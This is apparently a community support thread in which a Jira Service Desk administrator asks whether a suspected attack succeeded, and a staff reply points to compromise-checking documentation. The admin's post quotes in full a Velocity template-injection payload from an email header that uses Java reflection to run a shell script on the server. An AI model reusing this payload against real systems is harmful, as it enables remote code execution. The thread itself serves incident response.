I idid upgrade our Jira Servicedesk instance to version 4.2.3 on 12. July.
But we received a couple of strange emails which seem to show attack attempts:
Message body says:
New message from Contact Administrators page
But the the message header contains code
[QDOSE Support] #set ($cmd="bash /tmp/baby") #set ($e="exp") #set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd)) #set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a)) #set($sc = $e.getClass().forName("java.util.Scanner")) #set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream"))) #set($scan=$constructor.newInstance($input).useDelimiter("\A")) #if($scan.hasNext()) $scan.next() #end
It looks like somebody tried to exploit vulnerability
How can we check if that attempt was successful or not?
Any recommendations how to make it more secure?
Thank you
Michael
Hi there,
Thank you for reaching out to Atlassian Community!
We can't say for sure if your instance is compromised or not. There are some settings that you need to check to make sure if everything is ok.
Please, check the documentation below for more information:
- Determining whether your Jira instance has been compromised by CVE-2019-11851
What we would suggest is if the instance has been infected, you should not use the same VM anymore and the best thing would be restored Jira into a brand new instance.
Regards,
Angélica
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.